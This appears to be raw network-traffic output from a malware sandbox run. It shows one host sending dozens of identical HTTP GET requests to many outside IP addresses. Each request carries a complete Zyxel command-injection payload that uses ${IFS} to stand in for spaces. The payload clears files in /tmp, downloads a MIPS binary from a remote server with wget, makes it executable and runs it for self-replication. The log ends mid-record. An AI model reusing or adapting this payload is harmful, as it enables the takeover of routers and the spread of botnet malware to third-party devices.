                                            Feb 2, 2024 06:21:22.824332952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7116192.168.2.154499631.54.186.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824363947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7117192.168.2.155473667.34.5.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824397087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7118192.168.2.1552158165.102.248.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824425936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7119192.168.2.1558996118.64.67.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824439049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7120192.168.2.154949493.189.194.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824474096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7121192.168.2.1542570129.3.219.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824506998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7122192.168.2.1553578119.84.146.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824539900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7123192.168.2.155645834.248.174.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824573040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7124192.168.2.153798664.175.123.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824603081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7125192.168.2.155305068.228.169.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824645042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7126192.168.2.154472463.225.129.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824697018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7127192.168.2.1541722187.52.4.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824727058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7128192.168.2.155196445.23.99.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824755907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7129192.168.2.15424628.200.7.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824779034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7130192.168.2.1536636200.155.9.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824826002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7131192.168.2.15607602.18.242.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824857950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7132192.168.2.154766892.132.241.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824897051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7133192.168.2.154115691.124.17.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824929953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7134192.168.2.1536896216.144.172.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824959040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7135192.168.2.155110677.49.73.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825006008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7136192.168.2.1534832117.195.224.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825037956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7137192.168.2.1551470166.113.152.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825069904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7138192.168.2.153702085.179.141.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825109005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7139192.168.2.1535242118.45.74.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825139046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7140192.168.2.1538136108.4.51.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825181007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7141192.168.2.1539732135.216.17.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825216055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7142192.168.2.1548648201.106.25.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825249910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7143192.168.2.15450361.237.110.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825263023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7144192.168.2.153330057.73.180.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825326920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7145192.168.2.1547006146.128.106.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825342894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7146192.168.2.1557656147.193.156.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825396061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7147192.168.2.1557582209.30.3.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825427055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7148192.168.2.153663072.238.242.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825473070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7149192.168.2.1555836196.131.67.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825505972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7150192.168.2.1559690222.150.248.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825541973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7151192.168.2.1555976192.191.158.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825570107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7152192.168.2.154514892.86.142.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825618982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7153192.168.2.1550984103.99.77.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825639009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7154192.168.2.1556692183.192.147.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825664997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7155192.168.2.154885224.199.108.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825692892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7156192.168.2.155019023.109.173.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825716972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7157192.168.2.154612052.188.117.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825753927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7158192.168.2.1534304143.34.203.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825802088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7159192.168.2.1535214172.242.150.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825828075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7160192.168.2.1558120105.19.189.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825870991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7161192.168.2.155806674.35.6.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825898886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7162192.168.2.1539622160.218.234.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825926065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7163192.168.2.154222890.96.208.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825953007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7164192.168.2.155882669.255.10.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.825989008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7165192.168.2.153810877.250.188.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.826044083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7166192.168.2.1538036118.49.13.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.826096058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7167192.168.2.1547372169.78.13.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.826101065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7168192.168.2.1537070143.225.252.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.826116085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7169192.168.2.156093657.80.175.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.826157093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7170192.168.2.154037079.25.116.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.826179981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7171192.168.2.1550626208.139.70.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.826236963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7172192.168.2.155902417.98.84.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.826278925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7173192.168.2.1558472195.101.37.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.826308012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7174192.168.2.1535208100.165.35.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.826344967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7175192.168.2.1557850114.173.145.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.826387882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7176192.168.2.1543324210.52.183.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.826405048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7177192.168.2.156047047.65.25.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.826452971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7178192.168.2.1548958180.9.176.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.826474905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7179192.168.2.1536724221.129.190.56443
                                            TimestampBytes transferredDirectionData
